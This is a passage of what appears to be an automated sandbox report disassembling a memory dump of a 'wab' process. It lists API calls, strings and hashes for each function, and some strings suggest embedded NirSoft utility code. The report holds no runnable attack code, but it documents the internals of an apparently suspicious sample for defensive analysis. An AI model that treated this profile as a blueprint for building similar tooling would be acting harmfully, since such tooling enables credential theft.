                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                    • String ID: 4$h
                    • API String ID: 4066021378-1856150674
                    • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                    • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                    Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_snwprintf
                    • String ID: %%0.%df
                    • API String ID: 3473751417-763548558
                    • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                    • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                    Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                    Download Yara Rule
                    APIs
                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                    • KillTimer.USER32(?,00000041), ref: 004060D7
                    • KillTimer.USER32(?,00000041), ref: 004060E8
                    • GetTickCount.KERNEL32 ref: 0040610B
                    • GetParent.USER32(?), ref: 00406136
                    • SendMessageW.USER32(00000000), ref: 0040613D
                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                    • String ID: A
                    • API String ID: 2892645895-3554254475
                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                    Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadMenuW.USER32(?,?), ref: 0040D97F
                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                    • GetDesktopWindow.USER32 ref: 0040D9FD
                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                    • memset.MSVCRT ref: 0040DA23
                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                    • DestroyWindow.USER32(00000005), ref: 0040DA70
                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                    • String ID: caption
                    • API String ID: 973020956-4135340389
                    • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                    • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                    • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                    • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                    Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • <table dir="rtl"><tr><td>, xrefs: 00410B00
                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_snwprintf$wcscpy
                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                    • API String ID: 1283228442-2366825230
                    • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                    • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                    • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                    • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                    Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                    Download Yara Rule
                    APIs
                    • wcschr.MSVCRT ref: 00413972
                    • wcscpy.MSVCRT ref: 00413982
                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                    • wcscpy.MSVCRT ref: 004139D1
                    • wcscat.MSVCRT ref: 004139DC
                    • memset.MSVCRT ref: 004139B8
                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                    • memset.MSVCRT ref: 00413A00
                    • memcpy.MSVCRT ref: 00413A1B
                    • wcscat.MSVCRT ref: 00413A27
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                    • String ID: \systemroot
                    • API String ID: 4173585201-1821301763
                    • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                    • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                    • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                    • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                    Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscpy
                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                    • API String ID: 1284135714-318151290
                    • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                    • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                    • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                    • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                    Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                    • String ID: 0$6
                    • API String ID: 4066108131-3849865405
                    • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                    • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                    Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004082EF
                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                    • memset.MSVCRT ref: 00408362
                    • memset.MSVCRT ref: 00408377
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ByteCharMultiWide
                    • String ID:
                    • API String ID: 290601579-0
                    • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                    • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                    Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memchrmemset
                    • String ID: PD$PD
                    • API String ID: 1581201632-2312785699
                    • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                    • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                    • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                    • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                    Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                    Download Yara Rule
                    APIs
                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                    • GetDC.USER32(00000000), ref: 00409F6E
                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                    • GetWindowRect.USER32(?,?), ref: 00409FA0
                    • GetParent.USER32(?), ref: 00409FA5
                    • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                    • String ID:
                    • API String ID: 2163313125-0
                    • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                    • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                    • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                    • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                    Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$wcslen
                    • String ID:
                    • API String ID: 239872665-3916222277
                    • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                    • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                    • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                    • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                    Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpywcslen$_snwprintfmemset
                    • String ID: %s (%s)$YV@
                    • API String ID: 3979103747-598926743
                    • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                    • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                    Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                    • wcslen.MSVCRT ref: 0040A6B1
                    • wcscpy.MSVCRT ref: 0040A6C1
                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                    • wcscpy.MSVCRT ref: 0040A6DB
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                    • String ID: Unknown Error$netmsg.dll
                    • API String ID: 2767993716-572158859
                    • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                    • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                    Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    • wcscpy.MSVCRT ref: 0040DAFB
                    • wcscpy.MSVCRT ref: 0040DB0B
                    • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                      • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfilewcscpy$AttributesFileString
                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                    • API String ID: 3176057301-2039793938
                    • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                    • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                    • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                    • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                    Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • cannot ATTACH database within transaction, xrefs: 0042F663
                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                    • database %s is already in use, xrefs: 0042F6C5
                    • unable to open database: %s, xrefs: 0042F84E
                    • database is already attached, xrefs: 0042F721
                    • out of memory, xrefs: 0042F865
                    • too many attached databases - max %d, xrefs: 0042F64D
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                    • API String ID: 1297977491-2001300268
                    • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                    • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                    Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                    • memcpy.MSVCRT ref: 0040EB80
                    • memcpy.MSVCRT ref: 0040EB94
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                    • String ID: ($d
                    • API String ID: 1140211610-1915259565
                    • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                    • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                    • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                    • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                    Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                    Download Yara Rule
                    APIs
                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                    • Sleep.KERNEL32(00000001), ref: 004178E9
                    • GetLastError.KERNEL32 ref: 004178FB
                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$ErrorLastLockSleepUnlock
                    • String ID:
                    • API String ID: 3015003838-0
                    • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                    • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                    • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                    • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                    Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00407E44
                    • memset.MSVCRT ref: 00407E5B
                    • _mbscpy.MSVCRT ref: 00407E7E
                    • _mbscpy.MSVCRT ref: 00407ED7
                    • _mbscpy.MSVCRT ref: 00407EEE
                    • _mbscpy.MSVCRT ref: 00407F01
                    • wcscpy.MSVCRT ref: 00407F10
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                    • String ID:
                    • API String ID: 59245283-0
                    • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                    • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                    • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                    • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                    Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                    Download Yara Rule
                    APIs
                    • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                    • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                    • GetLastError.KERNEL32 ref: 0041855C
                    • Sleep.KERNEL32(00000064), ref: 00418571
                    • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                    • GetLastError.KERNEL32 ref: 0041858E
                    • Sleep.KERNEL32(00000064), ref: 004185A3
                    • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$AttributesDeleteErrorLastSleep$??3@
                    • String ID:
                    • API String ID: 3467550082-0
                    • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                    • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                    • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                    • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                    Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                    • API String ID: 3510742995-3273207271
                    • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                    • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                    • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                    • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                    Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                    Download Yara Rule
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                    • memset.MSVCRT ref: 00413ADC
                    • memset.MSVCRT ref: 00413AEC
                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                    • memset.MSVCRT ref: 00413BD7
                    • wcscpy.MSVCRT ref: 00413BF8
                    • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
